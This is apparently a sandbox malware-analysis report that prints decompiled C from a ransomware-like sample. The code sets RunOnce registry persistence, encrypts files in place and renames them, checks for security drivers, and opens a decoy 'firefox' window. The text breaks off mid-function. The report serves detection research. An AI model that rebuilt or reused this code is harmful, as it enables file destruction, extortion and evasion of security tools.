                                      				_t10 =  &_v8; // 0x402c45
                                      				_v136 = 0x540046;
                                      				_v132 = 0x410057;
                                      				_v128 = 0x450052;
                                      				_v124 = 0x4d005c;
                                      				_v120 = 0x630069;
                                      				_v116 = 0x6f0072;
                                      				_v112 = 0x6f0073;
                                      				_v108 = 0x740066;
                                      				_v104 = 0x57005c;
                                      				_v100 = 0x6e0069;
                                      				_v96 = 0x6f0064;
                                      				_v92 = 0x730077;
                                      				_v88 = 0x43005c;
                                      				_v84 = 0x720075;
                                      				_v80 = 0x650072;
                                      				_v76 = 0x74006e;
                                      				_v72 = 0x650056;
                                      				_v68 = 0x730072;
                                      				_v64 = 0x6f0069;
                                      				_v60 = 0x5c006e;
                                      				_v56 = 0x750052;
                                      				_v52 = 0x4f006e;
                                      				_v48 = 0x63006e;
                                      				_v44 = 0x65;
                                      				if(RegCreateKeyExW(0x80000001,  &_v140, 0, 0, 0, 0xf003f, 0, _t10, 0) != 0) {
                                      					return 0;
                                      				} else {
                                      					_t47 = lstrlenW(_t58);
                                      					_t37 =  &_v8; // 0x402c45
                                      					RegSetValueExW( *_t37,  &_v32, 0, 1, _t58, _t47 + _t47);
                                      					asm("sbb esi, esi");
                                      					RegCloseKey(_v8);
                                      					_t39 =  &(_t58[1]); // 0x1
                                      					return _t39;
                                      				}
                                      			}





































                                      0x0040296b
                                      0x0040296d
                                      0x00402979
                                      0x00402980
                                      0x00402984
                                      0x0040298c
                                      0x00402993
                                      0x0040299a
                                      0x004029a8
                                      0x004029b0
                                      0x004029ba
                                      0x004029bd
                                      0x004029c7
                                      0x004029ce
                                      0x004029eb
                                      0x004029f8
                                      0x004029ff
                                      0x00402a06
                                      0x00402a0d
                                      0x00402a14
                                      0x00402a1b
                                      0x00402a22
                                      0x00402a29
                                      0x00402a30
                                      0x00402a37
                                      0x00402a3e
                                      0x00402a45
                                      0x00402a4c
                                      0x00402a53
                                      0x00402a5a
                                      0x00402a61
                                      0x00402a68
                                      0x00402a6f
                                      0x00402a76
                                      0x00402a7d
                                      0x00402a8c
                                      0x00402ac7
                                      0x00402a8e
                                      0x00402a8f
                                      0x00402aa1
                                      0x00402aa4
                                      0x00402aaf
                                      0x00402ab1
                                      0x00402ab7
                                      0x00402abf
                                      0x00402abf

                                      APIs
                                      • lstrlenW.KERNEL32(00520050,00000041,74CF82B0,00000000), ref: 0040299D
                                        • Part of subcall function 00407C60: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 00407C7D
                                        • Part of subcall function 00407C60: VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000040), ref: 00407CAB
                                        • Part of subcall function 00407C60: GetModuleHandleA.KERNEL32(?), ref: 00407CFF
                                        • Part of subcall function 00407C60: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 00407D0D
                                        • Part of subcall function 00407C60: GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 00407D1C
                                        • Part of subcall function 00407C60: CryptReleaseContext.ADVAPI32(?,00000000), ref: 00407D65
                                        • Part of subcall function 00407C60: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00407D73
                                      • RegCreateKeyExW.ADVAPI32(80000001,004F0053,00000000,00000000,00000000,000F003F,00000000,E,@,00000000), ref: 00402A84
                                      • lstrlenW.KERNEL32(00000000), ref: 00402A8F
                                      • RegSetValueExW.ADVAPI32(E,@,00520050,00000000,00000001,00000000,00000000), ref: 00402AA4
                                      • RegCloseKey.ADVAPI32(?), ref: 00402AB1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.295315372.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000D.00000002.295311869.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295321838.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295337067.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_vkspii.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ContextCryptVirtuallstrlen$AcquireAddressAllocCloseCreateFreeHandleLibraryLoadModuleProcReleaseValue
                                      • String ID: A$E,@$F$H$I$P$R$R$S$U$V$W$\$\$\$d$e$f$i$i$i$n$n$n$n$r$r$r$s$u$w
                                      • API String ID: 553367697-1908525871
                                      • Opcode ID: e827ed829d67568777a520a8f55151da742d49e97d6881ee8a144ae909d7bb11
                                      • Instruction ID: 6d84f0b14520ef3984e43a4999751383e09c14a2564039d175e156e7e031e40b
                                      • Opcode Fuzzy Hash: e827ed829d67568777a520a8f55151da742d49e97d6881ee8a144ae909d7bb11
                                      • Instruction Fuzzy Hash: A431DBB090021CDFEB20CF91E949BEDBFB5FB01709F108119D5187A292D7BA4948CF95
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      C-Code - Quality: 83%
                                      			E004035E0(WCHAR* __ecx, void* __edx, void* __eflags) {
                                      				signed int _v8;
                                      				long _v12;
                                      				long _v16;
                                      				long _v20;
                                      				long _v24;
                                      				void* _v28;
                                      				WCHAR* _v32;
                                      				void* _v36;
                                      				long _v40;
                                      				void* _v44;
                                      				void* _v48;
                                      				WCHAR* _v52;
                                      				void* _v56;
                                      				void* _v60;
                                      				signed int _v64;
                                      				void _v68;
                                      				intOrPtr _v72;
                                      				intOrPtr _v76;
                                      				short _v80;
                                      				long _v84;
                                      				char _v88;
                                      				char _v104;
                                      				char _v108;
                                      				char _v140;
                                      				char _v388;
                                      				void* _t92;
                                      				void* _t93;
                                      				void* _t95;
                                      				void* _t100;
                                      				void* _t106;
                                      				long _t121;
                                      				long _t122;
                                      				void* _t123;
                                      				long _t125;
                                      				WCHAR* _t139;
                                      				void* _t142;
                                      				void* _t145;
                                      				void* _t147;
                                      				WCHAR* _t158;
                                      				WCHAR* _t160;
                                      				void* _t161;
                                      				void* _t162;
                                      				void _t164;
                                      				long _t165;
                                      				void* _t167;
                                      				void* _t169;
                                      				void* _t170;
                                      				void* _t171;
                                      
                                      				_t139 = __ecx;
                                      				_t162 = __edx;
                                      				_v52 = __ecx;
                                      				SetFileAttributesW(_t139, GetFileAttributesW(__ecx) & 0xfffffffe);
                                      				_v20 = 0;
                                      				_v40 = 0;
                                      				_t147 = _t162;
                                      				E00405EA0(_t147, 0, 0,  &_v20,  &_v40);
                                      				_t158 = VirtualAlloc(0, 0x401, 0x3000, 0x40);
                                      				_v80 = 0x47002e;
                                      				_v32 = _t158;
                                      				_v76 = 0x430044;
                                      				_v72 = 0x42;
                                      				lstrcpyW(_t158, _t139);
                                      				lstrcatW(_t158,  &_v80);
                                      				asm("movdqa xmm0, [0x410950]");
                                      				asm("movdqu [ebp-0x88], xmm0");
                                      				_push(_t147);
                                      				asm("movdqa xmm0, [0x410950]");
                                      				asm("movdqu [ebp-0x78], xmm0");
                                      				_v108 = 0;
                                      				asm("movdqa xmm0, [0x410950]");
                                      				asm("movdqu [ebp-0x64], xmm0");
                                      				E00407DB0( &_v104, 0x10);
                                      				E00407DB0( &_v140, 0x20);
                                      				_t92 = VirtualAlloc(0, 0x800, 0x3000, 4);
                                      				asm("movdqu xmm0, [ebp-0x88]");
                                      				asm("movdqu [ebx], xmm0");
                                      				asm("movdqu xmm0, [ebp-0x78]");
                                      				_v44 = _t92;
                                      				asm("movdqu [ebx+0x10], xmm0");
                                      				_t93 = VirtualAlloc(0, 0x800, 0x3000, 4);
                                      				asm("movdqu xmm0, [ebp-0x64]");
                                      				_t159 = _t93;
                                      				_v48 = _t93;
                                      				asm("movdqu [edi], xmm0");
                                      				_v88 = 0x20;
                                      				_v84 = 0x10;
                                      				_t95 = E00406000(_v20, _v40, _t92,  &_v88, 0x800);
                                      				_t169 = _t167 + 0x18;
                                      				if(_t95 == 0) {
                                      					L22:
                                      					_t160 = _v32;
                                      					asm("xorps xmm0, xmm0");
                                      					asm("movlpd [ebp-0x40], xmm0");
                                      					_t164 = _v68;
                                      					_v8 = _v64;
                                      					L23:
                                      					VirtualFree(_t160, 0, 0x8000);
                                      					return _t164;
                                      				}
                                      				_t100 = E00406000(_v20, _v40, _t159,  &_v84, 0x800);
                                      				_t170 = _t169 + 0x14;
                                      				if(_t100 != 0) {
                                      					E00407EE0( &_v140,  &_v388);
                                      					_t171 = _t170 + 8;
                                      					_t142 = CreateFileW(_v52, 0xc0000000, 1, 0, 3, 0x80, 0);
                                      					_v36 = _t142;
                                      					if(_t142 == 0xffffffff) {
                                      						goto L22;
                                      					}
                                      					_t161 = VirtualAlloc(0, 8, 0x3000, 4);
                                      					 *_t161 = 0;
                                      					 *(_t161 + 4) = 0;
                                      					_t106 = VirtualAlloc(0, 0x100001, 0x3000, 4);
                                      					_t165 = 0;
                                      					_v28 = _t106;
                                      					_v24 = 0;
                                      					while(ReadFile(_t142, _t106, 0x100000,  &_v12, 0) != 0) {
                                      						_t121 = _v12;
                                      						if(_t121 == 0) {
                                      							break;
                                      						}
                                      						_t145 = 0;
                                      						_v60 = 0;
                                      						_t165 =  <  ? 1 : _t165;
                                      						 *_t161 =  *_t161 + _t121;
                                      						asm("adc [edi+0x4], ebx");
                                      						_t122 = _v12;
                                      						_v8 = _t122;
                                      						if((_t122 & 0x0000000f) == 0) {
                                      							L12:
                                      							_t123 = VirtualAlloc(0, _t122, 0x3000, 4);
                                      							_t42 =  &_v8; // 0x406438
                                      							_v56 = _t123;
                                      							E004084E0(_t123, _v28,  *_t42);
                                      							_t125 = _v12;
                                      							_t171 = _t171 + 0xc;
                                      							_v64 = _t125;
                                      							if(VirtualAlloc(0, _t125, 0x3000, 4) != 0) {
                                      								L00403500(_v56, _v64,  &_v60,  &_v388,  &_v104, _t126);
                                      								_t145 = _v60;
                                      								_t171 = _t171 + 0x10;
                                      							}
                                      							VirtualFree(_v56, 0, 0x8000);
                                      							SetFilePointer(_v36,  ~_v8, 0, 1);
                                      							if(WriteFile(_v36, _t145, _v12,  &_v16, 0) == 0) {
                                      								_t165 = 1;
                                      								_v24 = 1;
                                      							}
                                      							VirtualFree(_t145, 0, 0x8000);
                                      							_t142 = _v36;
                                      							if(_t165 == 0) {
                                      								_t106 = _v28;
                                      								continue;
                                      							} else {
                                      								break;
                                      							}
                                      						}
                                      						do {
                                      							_t122 = _t122 + 1;
                                      						} while ((_t122 & 0x0000000f) != 0);
                                      						_v12 = _t122;
                                      						goto L12;
                                      					}
                                      					VirtualFree(_v28, 0, 0x8000);
                                      					if(_v24 == 0) {
                                      						WriteFile(_t142, _v44, 0x100,  &_v16, 0);
                                      						WriteFile(_t142, _v48, 0x100,  &_v16, 0);
                                      						WriteFile(_t142, _t161, 0x10,  &_v16, 0);
                                      					}
                                      					CloseHandle(_t142);
                                      					_t164 =  *_t161;
                                      					_v8 =  *(_t161 + 4);
                                      					VirtualFree(_t161, 0, 0x8000);
                                      					VirtualFree(_v44, 0, 0x8000);
                                      					VirtualFree(_v48, 0, 0x8000);
                                      					_t160 = _v32;
                                      					if(_v24 == 0) {
                                      						MoveFileW(_v52, _t160);
                                      					}
                                      					goto L23;
                                      				}
                                      				GetLastError();
                                      				goto L22;
                                      			}



















































                                      0x004035eb
                                      0x004035ed
                                      0x004035f1
                                      0x004035ff
                                      0x00403608
                                      0x00403613
                                      0x0040361f
                                      0x00403621
                                      0x0040363c
                                      0x0040363e
                                      0x00403647
                                      0x0040364a
                                      0x00403651
                                      0x00403658
                                      0x00403663
                                      0x00403669
                                      0x00403676
                                      0x0040367e
                                      0x0040367f
                                      0x0040368a
                                      0x0040368f
                                      0x00403693
                                      0x0040369b
                                      0x004036a0
                                      0x004036b0
                                      0x004036c6
                                      0x004036c8
                                      0x004036de
                                      0x004036e4
                                      0x004036e9
                                      0x004036ec
                                      0x004036f1
                                      0x004036f3
                                      0x004036f8
                                      0x00403703
                                      0x00403706
                                      0x0040370a
                                      0x00403711
                                      0x0040371f
                                      0x0040372a
                                      0x0040372f
                                      0x0040397c
                                      0x0040397c
                                      0x0040397f
                                      0x00403982
                                      0x0040398a
                                      0x0040398d
                                      0x00403990
                                      0x00403998
                                      0x004039a5
                                      0x004039a5
                                      0x00403745
                                      0x0040374a
                                      0x0040374f
                                      0x0040376a
                                      0x0040376f
                                      0x0040378d
                                      0x0040378f
                                      0x00403795
                                      0x00000000
                                      0x00403976
                                      0x004037aa
                                      0x004037b8
                                      0x004037be
                                      0x004037c5
                                      0x004037c7
                                      0x004037c9
                                      0x004037cc
                                      0x004037d4
                                      0x004037ef
                                      0x004037f4
                                      0x00000000
                                      0x00000000
                                      0x004037fa
                                      0x00403806
                                      0x00403809
                                      0x0040380c
                                      0x0040380e
                                      0x00403811
                                      0x00403814
                                      0x00403819
                                      0x00403828
                                      0x00403832
                                      0x00403838
                                      0x0040383b
                                      0x00403842
                                      0x00403847
                                      0x0040384a
                                      0x0040384d
                                      0x00403862
                                      0x0040387a
                                      0x0040387f
                                      0x00403882
                                      0x00403882
                                      0x0040388f
                                      0x004038a2
                                      0x004038bd
                                      0x004038bf
                                      0x004038c4
                                      0x004038c4
                                      0x004038cf
                                      0x004038d5
                                      0x004038da
                                      0x004037d1
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x004038da
                                      0x00403820
                                      0x00403820
                                      0x00403821
                                      0x00403825
                                      0x00000000
                                      0x00403825
                                      0x004038ea
                                      0x004038f4
                                      0x0040390b
                                      0x0040391c
                                      0x00403928
                                      0x00403928
                                      0x0040392b
                                      0x00403934
                                      0x00403944
                                      0x00403947
                                      0x00403953
                                      0x0040395f
                                      0x00403965
                                      0x00403968
                                      0x0040396e
                                      0x0040396e
                                      0x00000000
                                      0x00403968
                                      0x00403751
                                      0x00000000

                                      APIs
                                      • GetFileAttributesW.KERNEL32(00000000,00000010,00000000,00000000), ref: 004035F4
                                      • SetFileAttributesW.KERNEL32(00000000,00000000), ref: 004035FF
                                      • VirtualAlloc.KERNEL32(00000000,00000401,00003000,00000040,00000000,00000000,00000000,?), ref: 0040363A
                                      • lstrcpyW.KERNEL32 ref: 00403658
                                      • lstrcatW.KERNEL32(00000000,0047002E), ref: 00403663
                                        • Part of subcall function 00407DB0: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,74CB66A0,00000000), ref: 00407DD0
                                        • Part of subcall function 00407DB0: VirtualAlloc.KERNEL32(00000000,00000011,00003000,00000040), ref: 00407DF8
                                        • Part of subcall function 00407DB0: GetModuleHandleA.KERNEL32(?), ref: 00407E4D
                                        • Part of subcall function 00407DB0: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 00407E5B
                                        • Part of subcall function 00407DB0: GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 00407E6A
                                        • Part of subcall function 00407DB0: CryptReleaseContext.ADVAPI32(?,00000000), ref: 00407E8E
                                        • Part of subcall function 00407DB0: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00407E9C
                                        • Part of subcall function 00407DB0: CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,004036A5), ref: 00407EB0
                                        • Part of subcall function 00407DB0: VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,004036A5), ref: 00407EBE
                                      • VirtualAlloc.KERNEL32(00000000,00000800,00003000,00000004), ref: 004036C6
                                      • VirtualAlloc.KERNEL32(00000000,00000800,00003000,00000004), ref: 004036F1
                                        • Part of subcall function 00406000: EnterCriticalSection.KERNEL32(00412AE8,?,00403724,00000000,00000000,00000000,?,00000800), ref: 0040600B
                                        • Part of subcall function 00406000: CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000,?,00403724,00000000,00000000,00000000), ref: 0040602E
                                        • Part of subcall function 00406000: GetLastError.KERNEL32(?,00403724,00000000,00000000,00000000), ref: 00406038
                                        • Part of subcall function 00406000: CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008,?,00403724,00000000,00000000,00000000), ref: 00406054
                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00403998
                                        • Part of subcall function 00406000: CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,?,00403724,00000000,00000000), ref: 00406089
                                        • Part of subcall function 00406000: CryptGetKeyParam.ADVAPI32(00000000,00000008,$7@,0000000A,00000000,?,00403724,00000000), ref: 004060AA
                                        • Part of subcall function 00406000: CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,0000000A,00000000,$7@,?,00403724,00000000), ref: 004060D2
                                        • Part of subcall function 00406000: GetLastError.KERNEL32(?,00403724,00000000), ref: 004060DB
                                        • Part of subcall function 00406000: CryptReleaseContext.ADVAPI32(00000000,00000000,?,00403724,00000000,00000000), ref: 004060F8
                                        • Part of subcall function 00406000: LeaveCriticalSection.KERNEL32(00412AE8,?,00403724,00000000,00000000), ref: 00406103
                                      • GetLastError.KERNEL32 ref: 00403751
                                      • CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000003,00000080,00000000), ref: 00403787
                                      • VirtualAlloc.KERNEL32(00000000,00000008,00003000,00000004), ref: 004037A6
                                      • VirtualAlloc.KERNEL32(00000000,00100001,00003000,00000004), ref: 004037C5
                                      • ReadFile.KERNEL32(00000000,00000000,00100000,?,00000000), ref: 004037E1
                                      • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00403832
                                      • _memmove.LIBCMT ref: 00403842
                                      • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 0040385A
                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0040388F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.295315372.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000D.00000002.295311869.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295321838.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295337067.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_vkspii.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Virtual$Crypt$Alloc$Context$FileFree$AcquireErrorLastRelease$AttributesCriticalSection$AddressCreateEncryptEnterHandleImportLeaveLibraryLoadModuleParamProcRead_memmovelstrcatlstrcpy
                                      • String ID: $.$8d@$B$D
                                      • API String ID: 837238375-279925716
                                      • Opcode ID: cc765af47e0748f127cec44c57b369b1d6a7a1ea1d6bebdc5749c6e163b29892
                                      • Instruction ID: e6440529c24e0b0f2c5be8c2954fde7d882e22268c9ef2e78ee628bee86a44a3
                                      • Opcode Fuzzy Hash: cc765af47e0748f127cec44c57b369b1d6a7a1ea1d6bebdc5749c6e163b29892
                                      • Instruction Fuzzy Hash: 28B15DB1E40309BBEB119F94CD45FEEBBB8AB48700F204125F644BA2D1DBB45E448B98
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      C-Code - Quality: 84%
                                      			E00402D30() {
                                      				struct _WNDCLASSEXW _v52;
                                      				struct tagMSG _v84;
                                      				intOrPtr _v88;
                                      				intOrPtr _v92;
                                      				char _v96;
                                      				short _t42;
                                      				void* _t49;
                                      				void* _t61;
                                      				void* _t62;
                                      				void* _t67;
                                      				void* _t69;
                                      				long _t71;
                                      
                                      				_push(_t62);
                                      				_push(_t69);
                                      				_v84.message = 0x6c006b;
                                      				_push(_t67);
                                      				_v84.wParam = 0x660069;
                                      				_v84.lParam = 0x73002e;
                                      				_v84.time = 0x730079;
                                      				_v84.pt = 0;
                                      				_v96 = 0x6c006b;
                                      				_v92 = 0x2e0031;
                                      				_v88 = 0x790073;
                                      				_v84.hwnd = 0x73;
                                      				if(E00402F50( &(_v84.message)) != 0 || E00402F50( &_v96) != 0) {
                                      					L5:
                                      					_v52.cbSize = 0x30;
                                      					_v52.style = 3;
                                      					_v52.lpfnWndProc = E00402C50;
                                      					_v52.cbClsExtra = 0;
                                      					_v52.cbWndExtra = 0;
                                      					_v52.hInstance = GetModuleHandleW(0);
                                      					_v52.hIcon = 0;
                                      					_v52.hCursor = LoadCursorW(0, 0x7f00);
                                      					_v52.hbrBackground = 6;
                                      					_v52.lpszMenuName = 0;
                                      					_v52.lpszClassName = L"win32app";
                                      					_v52.hIconSm = LoadIconW(_v52.hInstance, 0x7f00);
                                      					_t42 = RegisterClassExW( &_v52);
                                      					_push(0);
                                      					if(_t42 != 0) {
                                      						GetModuleHandleW();
                                      						_t71 = CreateWindowExW(0, L"win32app", L"firefox", 0xcf0000, 0x80000000, 0x80000000, 5, 5, 0, 0, GetModuleHandleW(0), 0);
                                      						SetWindowLongW(_t71, 0xfffffff0, 0);
                                      						if(_t71 != 0) {
                                      							ShowWindow(_t71, 5);
                                      							UpdateWindow(_t71);
                                      							_t49 = CreateThread(0, 0, E00402D10, _t71, 0, 0);
                                      							if(_t49 != 0) {
                                      								CloseHandle(_t49);
                                      							}
                                      							if(GetMessageW( &_v84, 0, 0, 0) != 0) {
                                      								do {
                                      									TranslateMessage( &_v84);
                                      								} while (DispatchMessageW( &_v84) != 0xdeadbeef && GetMessageW( &_v84, 0, 0, 0) != 0);
                                      							}
                                      							goto L15;
                                      						}
                                      						ExitThread(_t71);
                                      					}
                                      					ExitThread();
                                      				} else {
                                      					_v84.message = 0x730066;
                                      					_v84.wParam = 0x660064;
                                      					_v84.lParam = 0x2e0077;
                                      					_v84.time = 0x790073;
                                      					_v84.pt = 0x73;
                                      					if(E00402F50( &(_v84.message)) != 0) {
                                      						L15:
                                      						ExitThread(0);
                                      					}
                                      					_t61 = E004030A0(_t62, _t67, _t69);
                                      					if(_t61 != 0) {
                                      						goto L15;
                                      					}
                                      					_push(_t61);
                                      					E00402AD0();
                                      					goto L5;
                                      				}
                                      			}















                                      0x00402d39
                                      0x00402d3a
                                      0x00402d3d
                                      0x00402d45
                                      0x00402d4a
                                      0x00402d52
                                      0x00402d5a
                                      0x00402d62
                                      0x00402d67
                                      0x00402d6f
                                      0x00402d77
                                      0x00402d7f
                                      0x00402d8e
                                      0x00402de9
                                      0x00402df1
                                      0x00402df9
                                      0x00402e01
                                      0x00402e09
                                      0x00402e11
                                      0x00402e22
                                      0x00402e26
                                      0x00402e3d
                                      0x00402e41
                                      0x00402e49
                                      0x00402e51
                                      0x00402e5f
                                      0x00402e68
                                      0x00402e6e
                                      0x00402e73
                                      0x00402e7b
                                      0x00402eaf
                                      0x00402eb4
                                      0x00402ebc
                                      0x00402ec8
                                      0x00402ecf
                                      0x00402ee3
                                      0x00402eeb
                                      0x00402eee
                                      0x00402eee
                                      0x00402f09
                                      0x00402f17
                                      0x00402f1c
                                      0x00402f25
                                      0x00402f17
                                      0x00000000
                                      0x00402f09
                                      0x00402ebf
                                      0x00402ebf
                                      0x00402e75
                                      0x00402d9d
                                      0x00402da1
                                      0x00402da9
                                      0x00402db1
                                      0x00402db9
                                      0x00402dc1
                                      0x00402dd0
                                      0x00402f3d
                                      0x00402f3f
                                      0x00402f3f
                                      0x00402dd6
                                      0x00402ddd
                                      0x00000000
                                      0x00000000
                                      0x00402de3
                                      0x00402de4
                                      0x00000000
                                      0x00402de4

                                      APIs
                                        • Part of subcall function 00402F50: EnumDeviceDrivers.PSAPI(?,00000004,?), ref: 00402F74
                                      • GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 00402E19
                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00402E2E
                                      • LoadIconW.USER32 ref: 00402E59
                                      • RegisterClassExW.USER32 ref: 00402E68
                                      • ExitThread.KERNEL32 ref: 00402E75
                                        • Part of subcall function 00402F50: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00402F8D
                                      • GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?,00007F00), ref: 00402E7B
                                      • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00007F00), ref: 00402E81
                                      • CreateWindowExW.USER32 ref: 00402EA7
                                      • SetWindowLongW.USER32 ref: 00402EB4
                                      • ExitThread.KERNEL32 ref: 00402EBF
                                        • Part of subcall function 00402F50: EnumDeviceDrivers.PSAPI(00000000,00000000,?), ref: 00402FA8
                                        • Part of subcall function 00402F50: GetDeviceDriverBaseNameW.PSAPI(00000000,?,00000400), ref: 00402FCF
                                        • Part of subcall function 00402F50: lstrcmpiW.KERNEL32(?,006C006B), ref: 00402FE3
                                        • Part of subcall function 00402F50: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00402FFA
                                      • ExitThread.KERNEL32 ref: 00402F3F
                                        • Part of subcall function 00402AD0: VirtualAlloc.KERNEL32(00000000,00000800,00003000,00000040), ref: 00402AEA
                                        • Part of subcall function 00402AD0: GetModuleFileNameW.KERNEL32(00000000,00000000,00000100), ref: 00402B2C
                                        • Part of subcall function 00402AD0: GetTempPathW.KERNEL32(00000100,00000000), ref: 00402B38
                                        • Part of subcall function 00402AD0: ExitThread.KERNEL32 ref: 00402C47
                                      • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,00007F00), ref: 00402EC8
                                      • UpdateWindow.USER32(00000000), ref: 00402ECF
                                      • CreateThread.KERNEL32 ref: 00402EE3
                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00007F00), ref: 00402EEE
                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00402F05
                                      • TranslateMessage.USER32(?), ref: 00402F1C
                                      • DispatchMessageW.USER32 ref: 00402F23
                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00402F37
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.295315372.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000D.00000002.295311869.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295321838.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295337067.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_vkspii.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Thread$ExitHandleMessageModuleWindow$DeviceVirtual$AllocCreateDriversEnumLoadName$BaseClassCloseCursorDispatchDriverFileFreeIconLongPathRegisterShowTempTranslateUpdatelstrcmpi
                                      • String ID: 0$1$d$f$firefox$k$s$s$s$s$w$win32app
                                      • API String ID: 3011903443-520298170
                                      • Opcode ID: 605d35a8cd460521619b827d31ec0ae0cacd7f64ed54dbd115d713509215f6a8
                                      • Instruction ID: 6dadb659047271fd80ce1d130f626f3db599e38ffd86fa9de69c1f1ec4dcf306
                                      • Opcode Fuzzy Hash: 605d35a8cd460521619b827d31ec0ae0cacd7f64ed54dbd115d713509215f6a8
                                      • Instruction Fuzzy Hash: 0F515070248302AFF7109F618D0DB5B7AE4AF44748F10092DF684BA2D1D7F99945CB9E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 394 4040a0-4040b5 395 4040bb-404117 call 4039b0 call 406d90 call 406ba0 VirtualAlloc 394->395 396 40431c-404321 394->396 403 404128 395->403 404 404119-404122 395->404 405 40412a-40416b call 4069a0 call 407ba0 lstrlenW 403->405 404->403 406 404124-404126 404->406 411 404170-404182 405->411 406->405 411->411 412 404184 411->412 413 404190-40419d 412->413 413->413 414 40419f-4041bc call 407ba0 413->414 417 40423a-4042cf 414->417 418 4041be 414->418 419 4042d1-4042eb VirtualAlloc 417->419 420 404302-404317 VirtualFree call 407720 417->420 421 4041c0-4041e6 lstrcpyW lstrlenW 418->421 419->420 422 4042ed-4042ff wsprintfW 419->422 420->396 421->417 424 4041e8-4041ed 421->424 422->420 425 4041f3-4041fb 424->425 426 404227-404234 425->426 427 4041fd 425->427 426->425 429 404236 426->429 428 404200-404206 427->428 430 404322-404326 428->430 431 40420c-404212 428->431 429->417 430->421 432 404214-40421b 431->432 433 40421d-404221 431->433 432->428 432->433 433->426 433->430
                                      C-Code - Quality: 47%
                                      			E004040A0(void* __ecx) {
                                      				char _v148;
                                      				char _v152;
                                      				void* _v156;
                                      				short _v164;
                                      				intOrPtr _v168;
                                      				intOrPtr _v172;
                                      				intOrPtr _v176;
                                      				intOrPtr _v180;
                                      				intOrPtr _v184;
                                      				intOrPtr _v188;
                                      				intOrPtr _v192;
                                      				intOrPtr _v196;
                                      				intOrPtr _v200;
                                      				intOrPtr _v204;
                                      				intOrPtr _v208;
                                      				intOrPtr _v212;
                                      				intOrPtr _v216;
                                      				intOrPtr _v220;
                                      				intOrPtr _v224;
